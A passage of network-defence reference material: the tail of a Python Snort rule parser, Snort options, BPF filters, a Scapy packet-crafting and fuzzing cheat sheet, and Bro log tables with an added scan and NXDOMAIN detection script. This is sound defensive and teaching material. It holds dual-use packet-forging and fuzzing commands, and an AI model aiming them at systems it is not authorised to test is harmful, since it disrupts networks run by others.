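    for opt in options:
        opt = opt.strip()
        if not opt:
            continue
        keyword, sep, value = opt.partition(":")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        pairs.append((keyword.strip(), value if sep else None))
    return pairs


def parse_rule(text):
    """Header fields by name plus the ordered option list."""
    m = HEADER_RE.match(text)
    if not m:
        raise ValueError("not a Snort rule: " + text)
    rule = m.groupdict()
    rule["options"] = split_options(rule.pop("body"))
    return rule


def decode_content(value):
    """content: syntax -> bytes: text outside pipes is literal, hex inside |...|."""
    parts = value.split("|")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced '|' in content: " + value)
    out = bytearray()
    for i, part in enumerate(parts):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def dns_wire_name(name):
    """DNS wire form of a name: length-prefixed labels ending in a zero byte.
    This is why the rule's content reads |07|foundit|03|com."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def lint(rule):
    """Checks drawn from the option table: action/proto keywords, required
    msg/sid/rev, sid in the local range, decodable content strings."""
    problems = []
    opts = dict(rule["options"])
    if rule["action"] not in ACTIONS:
        problems.append("unknown action " + rule["action"])
    if rule["proto"] not in PROTOS:
        problems.append("unknown protocol " + rule["proto"])
    for key in ("msg", "sid", "rev"):
        if key not in opts:
            problems.append("missing " + key)
    sid = int(opts.get("sid") or 0)
    if 0 < sid < 1000000:
        problems.append("sid %d is in the range used by the distributed rule set" % sid)
    for keyword, value in rule["options"]:
        if keyword in ("content", "uricontent"):
            try:
                decode_content(value)
            except ValueError as err:
                problems.append(str(err))
    return problems


if __name__ == "__main__":
    rule = parse_rule(EXAMPLE_RULE)
    print(rule["action"], rule["proto"], rule["src"], rule["sport"],
          rule["direction"], rule["dst"], rule["dport"])
    for keyword, value in rule["options"]:
        print("  %-10s %r" % (keyword, value))
    print(decode_content("|07|foundit|03|com"), dns_wire_name("foundit.com"))
    print(lint(rule))
```

Option order is kept as a list rather than a dict because Snort evaluates content: options in sequence and the relative modifiers refer to the previous one; the dict in lint is only used for the presence checks.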

Basic Body Options


snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching, and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plugin architecture. Snort also has a modular real-time alerting capability, incorporating alerting and logging plugins for syslog, ASCII text files, UNIX sockets or XML.

Expressions (BPF filter primitives, the same syntax tcpdump uses; given on the command line or read from a file with -F)

decnet dst host        True if the DECNET destination address is host, which may be an address of the form ``10.123'' or a DECNET host name
decnet src host        True if the DECNET source address is host
decnet host host       True if either the DECNET source or destination address is host
dst host host          True if the IP destination field of the packet is host, which may be either an address or a name
dst net net            True if the IP destination address of the packet has a network number of net
dst port port          True if the packet is ip/tcp or ip/udp and has a destination port value of port
ether broadcast        True if the packet is an ethernet broadcast packet
ether multicast        True if the packet is an ethernet multicast packet
ether dst ehost        True if the ethernet destination address is ehost
ether host ehost       True if either the ethernet source or destination address is ehost
ether proto protocol   True if the packet is of ether type protocol
ether src ehost        True if the ethernet source address is ehost
expr relop expr        True if the relation holds, where relop is one of >, <, >=, <=, =, !=
gateway host           True if the packet used host as a gateway
greater length         True if the packet has a length greater than or equal to length
host host              True if either the IP source or destination of the packet is host
ip broadcast           True if the packet is an IP broadcast packet
ip multicast           True if the packet is an IP multicast packet
ip proto protocol      True if the packet is an IP packet (see ip(4P)) of protocol type protocol
ip, arp, rarp, decnet  Abbreviations for: ether proto p, where p is one of the above protocols
lat, moprc, mopdl      Abbreviations for: ether proto p, where p is one of the above protocols
less length            True if the packet has a length less than or equal to length
net net                True if either the IP source or destination address of the packet has a network number of net
net net/len            True if the IP address matches net with a netmask len bits wide
net net mask mask      True if the IP address matches net with the specific netmask
port port              True if either the source or destination port of the packet is port
src host host          True if the IP source field of the packet is host
src net net            True if the IP source address of the packet has a network number of net
src port port          True if the packet has a source port value of port
tcp, udp, icmp         Abbreviations for: ip proto p, where p is one of the above protocols

Options

-?                              Show the program usage statement and exit
--alert-before-pass             Process alert, drop, sdrop, or reject rules before pass rules (the default is pass first)
-A alert-mode                   Alert using the specified alert-mode (fast, full, console, test, none)
-b                              Log packets in a tcpdump(1) formatted file
-B address-conversion-mask      Convert all IP addresses in home-net to addresses specified by address-conversion-mask (obfuscation for sharing logs)
-C                              Print the character data from the packet payload only (no hex)
-c config-file                  Use the rules located in file config-file
--conf-error-out                Same as -x (exit if configuration problems occur)
--create-pidfile                Create PID file, even when not in daemon mode
--cs-dir <dir>                  Tell Snort to use the control socket and create the socket in dir
-D                              Run Snort in daemon mode
-d                              Dump the application layer data when displaying packets in verbose or packet logging mode
--daq <type>                    Select packet acquisition module (default is pcap)
--daq-dir <dir>                 Tell Snort where to find the desired DAQ
--daq-list [<dir>]              List packet acquisition modules available in dir
--daq-mode <mode>               Select the DAQ operating mode (read-file, passive, inline)
--daq-var <name=value>          Specify extra DAQ configuration variable
--dump-dynamic-rules directory  Create stub rule files from all loaded dynamic detection rules libraries in directory
--dynamic-detection-lib file    Load a dynamic detection rules shared library specified by file
--dynamic-detection-lib-dir directory
                                Load all dynamic detection rules shared libraries from directory
--dynamic-engine-lib file       Load a dynamic detection engine shared library specified by file
--dynamic-engine-lib-dir directory
                                Load all dynamic detection engine shared libraries from directory
--dynamic-preprocessor-lib file Load a dynamic preprocessor shared library specified by file
--dynamic-preprocessor-lib-dir directory
                                Load all dynamic preprocessor shared libraries from directory
-E                              *WIN32 ONLY* Log alerts to the Windows Event Log
-e                              Display/log the link layer packet headers
--enable-inline-test            Enable inline-test mode operation
--exit-check=count              Signal termination after count callbacks from DAQ_Acquire(), showing the time it takes from signaling until DAQ_Stop() is called
-f                              Activate PCAP line buffering
-F bpf-file                     Read BPF filters from bpf-file
-G id                           Use id as a base event ID when logging events
-g group                        Change the group/GID Snort runs under to group after initialization
-H                              Force hash tables to be deterministic instead of using a random number generator for the seed and scale
-h home-net                     Set the "home network" to home-net
--help                          Same as -?
--version                       Same as -V
-I                              Print out the receiving interface name in alerts
-i interface                    Sniff packets on interface
-k checksum-mode                Tune the internal checksum verification functionality with checksum-mode (all, noip, notcp, noudp, noicmp, none)
-K logging-mode                 Select a packet logging mode (pcap, ascii, none)
-L binary-log-file              Set the filename of the binary log file to binary-log-file
-l log-dir                      Set the output logging directory to log-dir
--logid id                      Same as -G
-M                              Log console messages to syslog when not running in daemon mode
-m umask                        Set the file mode creation mask to umask
-N                              Turn off packet logging (alerts still work)
-n packet-count                 Process packet-count packets and exit
--no-interface-pidfile          Do not include the interface name in the Snort PID file
--nolock-pidfile                Do not try to lock the Snort PID file
-O                              Obfuscate the IP addresses when in ASCII packet dump mode
-p                              Turn off promiscuous mode sniffing
-P snap-length                  Set the packet snaplen to snap-length
--pcap-dir=directory            A directory to recurse to look for pcaps
--pcap-file=file                File that contains a list of pcaps to read
--pcap-filter=filter            Shell style filter to apply when getting pcaps from file or directory
--pcap-list="list"              A space separated list of pcaps to read
--pcap-no-filter                Reset to use no filter when getting pcaps from file or directory
--pcap-reset                    If reading multiple pcaps, reset Snort to post-configuration state before reading the next pcap
--pcap-show                     Print a line saying what pcap is currently being read
--pcap-single=tcpdump-file      Same as -r
--perfmon-file pathname         Same as -Z
--pid-path directory            Specify the directory for the Snort PID file
--process-all-events            Process all queued events (drop, alert, ...); by default processing stops after the first action group
-Q                              Enable inline mode operation
-q                              Quiet operation
-R name                         Use name as a suffix to the Snort pidfile
-r tcpdump-file                 Read the tcpdump-formatted file tcpdump-file
--require-rule-sid              Require a SID for every rule, so that all rules can be correctly thresholded
-s                              Send alert messages to syslog
-S variable=value               Set variable name "variable" to value "value"
--snaplen snap-length           Same as -P
-T                              Start up in self-test mode, checking all the supplied command line switches and rules files and indicating that everything is ready to proceed
-t chroot                       Change Snort's root directory to chroot after initialization
--treat-drop-as-alert           Convert drop, sdrop, and reject rules into alert rules during startup


packetlife.net

by Jeremy Stretch v1.0

SCAPY

Constructing Packets

# Setting protocol fields
>>> ip=IP(src="10.0.0.1")
>>> ip.dst="10.0.0.2"

# Combining layers
>>> l3=IP()/TCP()
>>> l2=Ether()/l3

# Splitting layers apart
>>> l2.getlayer(1)
<IP frag=0 proto=tcp |<TCP |>>
>>> l2.getlayer(2)
<TCP |>

Basic Commands

ls()    List all available protocols and protocol options
lsc()   List all available scapy command functions
conf    Show/set scapy configuration parameters

Specifying Addresses and Values

# Explicit IP address (use quotation marks)
>>> IP(dst="192.0.2.1")

# DNS name to be resolved at time of transmission
>>> IP(dst="example.com")

# IP network (results in a packet template)
>>> IP(dst="192.0.2.0/24")

# Random addresses with RandIP() and RandMAC()
>>> IP(dst=RandIP())
>>> Ether(dst=RandMAC())

# Set a range of numbers to be used (template)
>>> IP(ttl=(1,30))

# Random numbers with RandInt() and RandLong()
>>> IP(id=RandInt())

Displaying Packets

# Show an entire packet
>>> (Ether()/IPv6()).show()
###[ Ethernet ]###
  dst= ff:ff:ff:ff:ff:ff
  src= 00:00:00:00:00:00
  type= 0x86dd
###[ IPv6 ]###
  version= 6
  tc= 0
  fl= 0
  plen= None
  nh= No Next Header
  hlim= 64
  src= ::1
  dst= ::1

# Show field types with default values
>>> ls(UDP())
sport  : ShortEnumField = 1025 (53)
dport  : ShortEnumField = 53 (53)
len    : ShortField = None (None)
chksum : XShortField = None (None)

Sending Packets

send(pkt, inter=0, loop=0, count=1, iface=N)      Send one or more packets at layer three
sendp(pkt, inter=0, loop=0, count=1, iface=N)     Send one or more packets at layer two
sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N)    Send packets much faster at layer two using tcpreplay

Sending and Receiving Packets

sr(pkt, filter=N, iface=N, timeout=N), srp(…)     Send packets and receive replies; returns (answered, unanswered)
sr1(pkt, filter=N, iface=N, timeout=N), srp1(…)   Send packets and return only the first reply
srloop(pkt, timeout=N, count=N), srploop(…)       Send packets in a loop and print each reply

Fuzzing

# Randomize fields where applicable
>>> fuzz(ICMP()).show()
###[ ICMP ]###
  type= <RandByte>
  code= 227
  chksum= None
  unused= <RandInt>

Sniffing Packets

sniff(count=0, store=1, timeout=N, filter=N, iface=N, prn=N)   Record packets off the wire; returns a list of packets when stopped (filter is a BPF string, prn a callback applied to each packet)

# Capture up to 100 packets (or stop with ctrl-c)
>>> pkts=sniff(count=100, iface="eth0")
>>> pkts
<Sniffed: TCP:92 UDP:7 ICMP:1 Other:0>

>>> send(IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.
>>> sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.

>>> srloop(IP(dst="packetlife.net")/ICMP(), count=3)
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140


conn.log: conn_state

State    Meaning
S0       Connection attempt seen, no reply
S1       Connection established, not terminated (0 byte counts)
SF       Normal establishment & termination (>0 byte counts)
REJ      Connection attempt rejected
S2       Established, ORIG attempts close, no reply from RESP
S3       Established, RESP attempts close, no reply from ORIG
RSTO     Established, ORIG aborted (RST)
RSTR     Established, RESP aborted (RST)
RSTOS0   ORIG sent SYN then RST; no RESP SYN-ACK
RSTRH    RESP sent SYN-ACK then RST; no ORIG SYN
SH       ORIG sent SYN then FIN; no RESP SYN-ACK ("half-open")
SHR      RESP sent SYN-ACK then FIN; no ORIG SYN
OTH      No SYN, not closed. Midstream traffic. Partial connection.

capture_loss.log: Estimate of packet loss

Field          Type      Description
ts             time      Measurement timestamp
ts_delta       interval  Time difference from previous measurement
peer           string    Name of the Bro instance reporting loss
gaps           count     ACKs seen without seeing data being ACKed
acks           count     Total number of TCP ACKs
percent_loss   string    gaps/acks, as a percentage. Estimate of loss.

dns.log: DNS query/response details

Field         Type    Description
ts            time    Timestamp of the DNS request
uid & id              Underlying connection info - see conn.log
proto         proto   Protocol of DNS transaction - TCP or UDP
trans_id      count   16 bit identifier assigned by DNS client; responses match
query         string  Domain name subject of the query
qclass        count   Value specifying the query class
qclass_name   string  Descriptive name of the query class (e.g. C_INTERNET)
qtype         count   Value specifying the query type
qtype_name    string  Name of the query type (e.g. A, AAAA, PTR)
rcode         count   Response code value in the DNS response
rcode_name    string  Descriptive name of the response code (e.g. NOERROR, NXDOMAIN)
QR            bool    Was this a query (T) or a response (F)?
AA            bool    T: server is authoritative for query
TC            bool    T: message was truncated
RD            bool    Recursion Desired. T = request recursive lookup of query
RA            bool    Recursion Available. T = server supports recursive queries
Z             count   Reserved field, should be zero in all queries & responses
answers       vector  List of resource descriptions in answer to the query
TTLs          vector  Caching intervals of the answers
rejected      bool    Whether the DNS query was rejected by the server

conn.log: IP, TCP, UDP and ICMP connection details

Field            Type      Description
ts               time      Timestamp
uid              string    Unique ID of connection
id.orig_h        addr      Originating endpoint's IP address (AKA ORIG)
id.orig_p        port      Originating endpoint's TCP/UDP port (or ICMP type)
id.resp_h        addr      Responding endpoint's IP address (AKA RESP)
id.resp_p        port      Responding endpoint's TCP/UDP port (or ICMP code)
proto            proto     Transport layer protocol of connection
service          string    Dynamically detected application protocol, if any
duration         interval  Connection length
orig_bytes       count     Originator payload bytes; from sequence numbers if TCP
resp_bytes       count     Responder payload bytes; from sequence numbers if TCP
conn_state       string    Connection state (see conn.log: conn_state table)
local_orig       bool      If conn originated locally T; if remotely F. If Site::local_nets is empty, always unset.
missed_bytes     count     Number of missing bytes in content gaps
history          string    Connection state history (see conn.log: history table)
orig_pkts        count     Number of ORIG packets
orig_ip_bytes    count     Number of ORIG IP bytes (via IP total_length header field)
resp_pkts        count     Number of RESP packets
resp_ip_bytes    count     Number of RESP IP bytes (via IP total_length header field)
tunnel_parents   set       If tunneled, connection UID of encapsulating parent(s)
orig_cc          string    ORIG GeoIP country code
resp_cc          string    RESP GeoIP country code

conn.log: history (ORIG letters UPPERCASE, RESP letters lowercase, uniq-ed: each letter is recorded once per side)

Letter   Meaning
S        a SYN without the ACK bit set
H        a SYN-ACK ("handshake")
A        a pure ACK
D        packet with payload ("data")
F        packet with FIN bit set
R        packet with RST bit set
C        packet with a bad checksum
I        inconsistent packet (both SYN & RST)
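The conn_state, conn.log, history and dns.log tables above are what you read when hunting in these logs; the following is an added example (not Broala's or Bro's code) that does the reading in a script. It parses Bro's TSV format from the #fields/#types header lines (so '-' and '(empty)' and set/vector columns come out typed), expands a history string with the letter table, flags originators whose TCP connections never complete a handshake (S0, REJ, RSTOS0) across several responder ports, and counts NXDOMAIN answers per client from dns.log. The log lines are constructed for the example, and parse_bro_log, explain_history, scan_candidates and nxdomain_by_client are this example's own names.

```python
from collections import defaultdict

# Constructed sample logs in Bro 2.3's TSV layout (not real traffic). The #fields and
# #types lines are the ones a real conn.log / dns.log carry, so parse_bro_log works
# unchanged on real files.
CONN_FIELDS = ("ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration "
               "orig_bytes resp_bytes conn_state local_orig missed_bytes history "
               "orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents").split()
CONN_TYPES = ("time string addr port addr port enum string interval count count string "
              "bool count string count count count count set[string]").split()
DNS_FIELDS = ("ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_id query qclass "
              "qclass_name qtype qtype_name rcode rcode_name QR AA TC RD RA Z answers "
              "TTLs rejected").split()
DNS_TYPES = ("time string addr port addr port enum count string count string count string "
             "count string bool bool bool bool bool count vector[string] vector[interval] "
             "bool").split()

def _header(path, fields, types):
    return ["#separator \\x09", "#set_separator\t,", "#empty_field\t(empty)",
            "#unset_field\t-", "#path\t" + path,
            "#fields\t" + "\t".join(fields), "#types\t" + "\t".join(types)]

def _conn(ts, uid, oh, op, rh, rp, state, history, obytes="0", rbytes="0"):
    return "\t".join([ts, uid, oh, op, rh, rp, "tcp", "-", "-", obytes, rbytes, state,
                      "-", "0", history, "1", "60", "0", "0", "(empty)"])

def _dns(ts, uid, oh, rh, query, rcode, rcode_name, answers="-", ttls="-"):
    return "\t".join([ts, uid, oh, "51000", rh, "53", "udp", "4660", query, "1",
                      "C_INTERNET", "1", "A", rcode, rcode_name, "F", "F", "F", "T",
                      "T", "0", answers, ttls, "F"])

CONN_LOG = "\n".join(_header("conn", CONN_FIELDS, CONN_TYPES) + [
    _conn("1398701900.1", "C1", "10.0.0.7", "40001", "192.0.2.10", "22", "S0", "S"),
    _conn("1398701900.2", "C2", "10.0.0.7", "40002", "192.0.2.10", "23", "REJ", "Sr"),
    _conn("1398701900.3", "C3", "10.0.0.7", "40003", "192.0.2.10", "80", "S0", "S"),
    _conn("1398701900.4", "C4", "10.0.0.7", "40004", "192.0.2.10", "443", "RSTOS0", "SR"),
    _conn("1398701901.0", "C5", "10.0.0.5", "40005", "192.0.2.44", "80", "SF", "ShADadFf",
          "412", "2810"),
    _conn("1398701902.0", "C6", "10.0.0.5", "40006", "192.0.2.44", "8080", "S0", "S")])
DNS_LOG = "\n".join(_header("dns", DNS_FIELDS, DNS_TYPES) + [
    _dns("1398701899.0", "C7", "10.0.0.7", "10.0.0.1", "xk3q.evil-example.net", "3", "NXDOMAIN"),
    _dns("1398701899.5", "C8", "10.0.0.7", "10.0.0.1", "p9zz.evil-example.net", "3", "NXDOMAIN"),
    _dns("1398701900.9", "C9", "10.0.0.5", "10.0.0.1", "www.example.com", "0", "NOERROR",
         "192.0.2.44", "300.000000")])

def parse_bro_log(text):
    """Parse a Bro TSV log into dicts keyed by its #fields line: '-' (unset) -> None,
    '(empty)' -> '' or [], and set[...]/vector[...] columns are split on ','."""
    fields, types, unset, empty, records = None, [], "-", "(empty)", []
    for line in text.splitlines():
        if line.startswith("#"):
            key, _, value = line[1:].partition("\t")
            if key == "fields":
                fields = value.split("\t")
            elif key == "types":
                types = value.split("\t")
            elif key == "unset_field":
                unset = value
            elif key == "empty_field":
                empty = value
            continue
        if not line or fields is None:
            continue
        record = {}
        for i, (name, raw) in enumerate(zip(fields, line.split("\t"))):
            multi = i < len(types) and types[i].startswith(("set[", "vector["))
            if raw == unset:
                record[name] = None
            elif raw == empty:
                record[name] = [] if multi else ""
            else:
                record[name] = raw.split(",") if multi else raw
        records.append(record)
    return records

SCAN_STATES = {"S0", "REJ", "RSTOS0"}   # conn_state values with no completed handshake
HISTORY = {"s": "SYN", "h": "SYN-ACK", "a": "ACK", "d": "data", "f": "FIN",
           "r": "RST", "c": "bad checksum", "i": "inconsistent (SYN+RST)"}

def explain_history(history):
    """Expand a history string; uppercase = originator's packet, lowercase = responder's."""
    return [("orig:" if ch.isupper() else "resp:") + HISTORY.get(ch.lower(), "?")
            for ch in history]

def scan_candidates(conns, min_targets=3):
    """Originators whose never-completed TCP connections reach at least min_targets
    distinct (responder, port) pairs: the shape of a port scan in conn.log."""
    targets = defaultdict(set)
    for c in conns:
        if c["proto"] == "tcp" and c["conn_state"] in SCAN_STATES:
            targets[c["id.orig_h"]].add((c["id.resp_h"], c["id.resp_p"]))
    return {h: sorted(t) for h, t in targets.items() if len(t) >= min_targets}

def nxdomain_by_client(dns_records):
    """NXDOMAIN answers per client; bursts of these accompany DGA-style beaconing."""
    counts = defaultdict(int)
    for r in dns_records:
        if r["rcode_name"] == "NXDOMAIN":
            counts[r["id.orig_h"]] += 1
    return dict(counts)
```

Run on the constructed logs, scan_candidates reports only 10.0.0.7 (four unanswered or rejected ports on 192.0.2.10; 10.0.0.5 has one S0 and one clean SF session), and nxdomain_by_client attributes both NXDOMAIN answers to the same host. Reading the #fields line rather than hard-coding column positions is what keeps the parser working when a site adds or removes columns such as orig_cc/resp_cc.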

dhcp.log: DHCP lease activity

Field         Type      Description
ts            time      Timestamp of request
uid & id                Underlying connection info - see conn.log
mac           string    Client's hardware address
assigned_ip   addr      Client's actual assigned IP address
lease_time    interval  IP address lease time
trans_id      count     Identifier assigned by the client; responses match

Bro 2.3 Logs cheat sheet, Version 2.0, © Broala LLC, www.broala.com


files.log: File analysis results

Field             Type      Description
ts                time      Timestamp when file was first seen
fuid              string    Unique identifier for a single file
tx_hosts          set       If transferred via network, host(s) that sourced the data
rx_hosts          set       If transferred via network, host(s) that received the data
conn_uids         set       Connection UID(s) over which the file was transferred
source            string    An identification of the source of the file data
depth             count     Depth of file related to source; e.g. SMTP MIME attachment depth; HTTP depth of the request
analyzers         set       Set of analysis types done during file analysis
mime_type         string    The file type, as determined by Bro's signatures
filename          string    If available, filename from source; frequently the "Content-Disposition" headers in network protocols
duration          interval  The duration the file was analyzed for
local_orig        bool      If transferred via network, did data originate locally?
is_orig           bool      If transferred via network, was file sent by the originator?
seen_bytes        count     Number of bytes provided to file analysis engine
total_bytes       count     Total number of bytes that should comprise the file
missing_bytes     count     Number of bytes in the file stream missed; e.g. dropped packets
overflow_bytes    count     Number of not all-in-sequence bytes in the file stream delivered to file analyzers due to reassembly buffer overflow
timedout          bool      If the file analysis timed out at least once per file
parent_fuid       string    ID associated with a container file from which this one was extracted as a part of the analysis
md5/sha1/sha256   string    MD5/SHA1/SHA256 hash of file, if enabled
extracted         string    Local filename of extracted files, if enabled

dnp3.log: Distributed Network Protocol (industrial control)

Field        Type    Description
ts           time    Timestamp
uid & id             Underlying connection info - see conn.log
fc_request   string  The name of the request function message
fc_reply     string  The name of the reply function message
iin          count   Response's "internal indication number"

irc.log: IRC communication details

Field           Type    Description
ts              time    Timestamp
uid & id                Underlying connection info - see conn.log
nick            string  Nickname given for this connection
user            string  Username given for this connection
command         string  Command given by the client
value           string  Value for the command given by the client
addl            string  Any additional data for the command
dcc_file_name   string  DCC filename requested
dcc_file_size   count   Size of the DCC transfer as indicated by the sender
dcc_mime_type   string  Sniffed mime type of the file
fuid            string  File unique ID

ftp.log: FTP request/reply details

Field          Type    Description
ts             time    Command timestamp
uid & id               Underlying connection info - see conn.log
user           string  Username for current FTP session
password       string  Password for current FTP session
command        string  Command issued by the client
arg            string  Command argument if present
mime_type      string  Libmagic sniffed file type if there is a file transfer
file_size      count   Size of transferred file
reply_code     count   Reply code from server in response to the command
reply_msg      string  Reply message from server in response to the command
data_channel   record  Information about the data channel (orig, resp, is passive)
fuid           string  File unique ID

intel.log: Hits on indicators from the intel framework

Field                 Type    Description
ts                    time    Timestamp of hit
uid & id                      Underlying connection info - see conn.log
fuid                  string  The UID for a file associated with this hit, if any
file_mime_type        string  A mime type if the hit is related to a file
file_desc             string  Additional context for file, if available
seen.indicator        string  The intelligence indicator
seen.indicator_type   string  The type of data the indicator represents
seen.where            string  Where the data was discovered
sources               set     Sources which supplied data for this match

http.log: HTTP request/reply details

Field               Type    Description
ts                  time    Timestamp of request
uid & id                    Underlying connection info - see conn.log
trans_depth         count   Pipelined depth into the connection
method              string  HTTP request verb: GET, POST, HEAD, etc.
host                string  Value of the HOST header
uri                 string  URI used in the request
referrer            string  Value of the "referer" header
user_agent          string  Value of the User-Agent header
request_body_len    count   Actual uncompressed content size of the data transferred from the client
response_body_len   count   Actual uncompressed content size of the data transferred from the server
status_code         count   Status code returned by the server
status_msg          string  Status message returned by the server
info_code           count   Last seen 1xx info reply code by server
info_msg            string  Last seen 1xx info reply message by server
filename            string  Via the Content-Disposition server header
tags                set     Indicators of various attributes discovered
username            string  If basic-auth is performed for the request
password            string  If basic-auth is performed for the request
proxied             set     Headers that might indicate a proxied request
orig_fuids          vector  An ordered vector of file unique IDs from orig
orig_mime_types     vector  An ordered vector of mime types from orig
resp_fuids          vector  An ordered vector of file unique IDs from resp
resp_mime_types     vector  An ordered vector of mime types from resp


notice.log: Logged notices

Field            Type      Description
ts               time      Timestamp
uid & id                   Underlying connection info - see conn.log
fuid             string    File unique identifier
file_mime_type   string    The file type, as determined by Bro's signatures
file_desc        string    Additional context for file, if available
proto            proto     Transport protocol
note             string    The type of the notice
msg              string    Human readable message for the notice
sub              string    Sub-message for the notice
src              addr      Source address
dst              addr      Destination address
p                port      Associated port, if any
n                count     Associated count or status code
peer_descr       string    Description for peer that raised this notice
actions          set       Actions applied to this notice
suppress_for     interval  Length of time dupes should be suppressed
dropped          bool      If the src IP was blocked

smtp.log: SMTP transactions

Field              Type    Description
ts                 time    Timestamp when the message was first seen
uid & id                   Underlying connection info - see conn.log
trans_depth        count   Transaction depth if there are multiple msgs
helo               string  Contents of the HELO header
mailfrom           string  Contents of the MAIL FROM header
rcptto             set     Contents of the RCPT TO header
date               string  Contents of the DATE header
from               string  Contents of the FROM header
to                 set     Contents of the TO header
reply_to           string  Contents of the ReplyTo header
msg_id             string  Contents of the MsgID header
in_reply_to        string  Contents of the In-Reply-To header
subject            string  Contents of the Subject header
x_originating_ip   addr    Contents of the X-Originating-IP header
first_received     string  Contents of the first Received header
second_received    string  Contents of the second Received header
last_reply         string  Last server to client message
path               vector  Message transmission path, from headers
user_agent         string  Value of the client User-Agent header
fuids              vector  File unique IDs seen attached to this msg
is_webmail         bool    If the message was sent via webmail

radius.log: RADIUS authentication attempts

Field          Type    Description
ts             time    Timestamp of the authentication attempt
uid & id               Underlying connection info - see conn.log
username       string  The username of the user attempting to auth
mac            string  The MAC address of the client (e.g. for wireless)
remote_ip      addr    The IP address of the client (e.g. for VPN)
connect_info   string  Additional connect information, if available
result         string  Whether the attempt succeeded or failed

socks.log: SOCKS proxy requests

Field          Type    Description
ts             time    Timestamp of request
uid & id               Underlying connection info - see conn.log
version        count   Protocol version of SOCKS
user           string  Username for the proxy, if available
status         string  Server status for the attempt using proxy
request.host   addr    Client requested address
request.name   string  Client requested name
request_p      port    Client requested port
bound.host     addr    Server bound address
bound.name     string  Server bound name
bound_p        port    Server bound port

Field Type Description
ts time Timestamp of the detection
host addr IP address running the software
host_p port Port on which the software is running (for servers)
software_type string Type of software (e.g. HTTP::SERVER)
name string Name of the software
version.major count Major version number of the software
version.minor count Minor version number of the software
version.minor2 count Minor subversion number of the software
version.minor3 count Minor update number of the software
version.addl string Additional version string (e.g. beta42)
unparsed_version string The full, unparsed version of the software

software.log Software identified by the software framework

Version: 2.0

Field Type Description
ts time Timestamp when the message was first seen
uid & id Underlying connection info - See conn.log
duration interval Time between the first and last seen packet
version string SNMP version (v1, v2c, v3)
community string The community string of the first SNMP packet
get_requests count Number of GetRequest/GetNextRequest packets
get_bulk_requests count Number of GetBulkRequest packets
get_responses count Number of GetResponse/Response packets
set_requests count Number of SetRequest packets
display_string string A system description of the responder
up_since time Timestamp the responder has been up since

snmp.log SNMP messages

©  Broala  LLC.    

Field Type Description
ts time Timestamp of request
uid & id Underlying connection info - See conn.log
func string Function message that was sent
exception string Exception if there was a failure

modbus.log PLC requests (industrial control)

Bro 2.3 Logs www.broala.com


Field Type Description
ts time Timestamp when the SSL connection was detected
uid & id Underlying connection info - See conn.log
version string SSL version that the server offered
cipher string SSL cipher suite that the server chose
curve string Elliptic curve the server chose if using ECDH/ECDHE
server_name string Value of the Server Name Indicator SSL extension
session_id string Session ID offered by client for session resumption
last_alert string Last alert that was seen during the connection
established bool Was this connection established successfully?
cert_chain vector Chain of certificates offered by the server
cert_chain_fuids vector File unique IDs for certs in cert_chain. See files.log
client_cert_chain vector Chain of certificates offered by the client
client_cert_chain_fuids vector File UIDs for certs in client_cert_chain. See files.log
subject string Subject of the X.509 cert offered by the server
issuer string Subject of the signer of the server cert
client_subject string Subject of the X.509 cert offered by the client
client_issuer_subject string Subject of the signer of the client cert
validation_status string Certificate validation result for this handshake
ocsp_status string Result of OCSP validation for this handshake
ocsp_response string OCSP response as a string

ssl.log SSL handshakes


Field Type Description
ts time Time when the cert was seen
id string File unique ID. See files.log
certificate.version count Version number
certificate.serial string Serial number
certificate.issuer string Issuer
certificate.not_valid_before time Time before when the cert is invalid
certificate.not_valid_after time Time after when the cert is invalid
certificate.key_alg string Name of the key algorithm
certificate.sig_alg string Name of the signature algorithm
certificate.key_type string Key type (either RSA, DSA or EC)
certificate.key_length count Key length, in bits
certificate.exponent string Exponent, if RSA
certificate.curve string Curve, if EC
san.dns string_vec List of DNS entries in Subject Alternative Name (SAN)
san.uri string_vec List of URI entries in SAN
san.email string_vec List of email entries in SAN
san.ip addr_vec List of IP entries in SAN
basic_constraints.ca bool CA flag set?
basic_constraints.path_len count Maximum path length

x509.log SSL certificate details

Field Type Description
ts time Timestamp of message
uid & id Underlying connection info - See conn.log
name string The name of the weird that occurred
addl string Additional information accompanying the weird, if any
notice bool Indicate if this weird was also turned into a notice
peer string The peer that generated this weird

weird.log Anomalies and protocol violations


Field Type Description
ts time Timestamp when the SSH connection was detected
uid & id Underlying connection info - See conn.log
status string If the login was heuristically guessed to be “success” or “failure”.
direction string Outbound or inbound connection
client string Software string from the client
server string Software string from the server
resp_size count Amount of data returned by the server

ssh.log SSH handshakes

Field Type Description
ts time Timestamp tunnel was detected
uid & id Underlying connection info - See conn.log
tunnel_type string The type of tunnel (e.g. Teredo, IP)
action string The activity that occurred (discovered, closed)

tunnel.log Details of encapsulating tunnels


Log Description
app_stats Statistics on usage of popular web apps
cluster Diagnostics for cluster operation
communication Diagnostics for inter-process communications
dpd Diagnostics for dynamic protocol detection
known_certs Observed local SSL certs. Each is logged once/day
known_devices Observed local devices. Each is logged once/day
known_hosts Observed local active IPs. Each is logged once/day
known_services Observed local services. Each is logged once/day
loaded_scripts A list of scripts that were loaded at startup
packet_filter Any filters to limit the traffic being analyzed
stats Diagnostics such as mem usage, packets seen, etc.
syslog Syslog messages
traceroute Hosts running traceroute

Other Logs


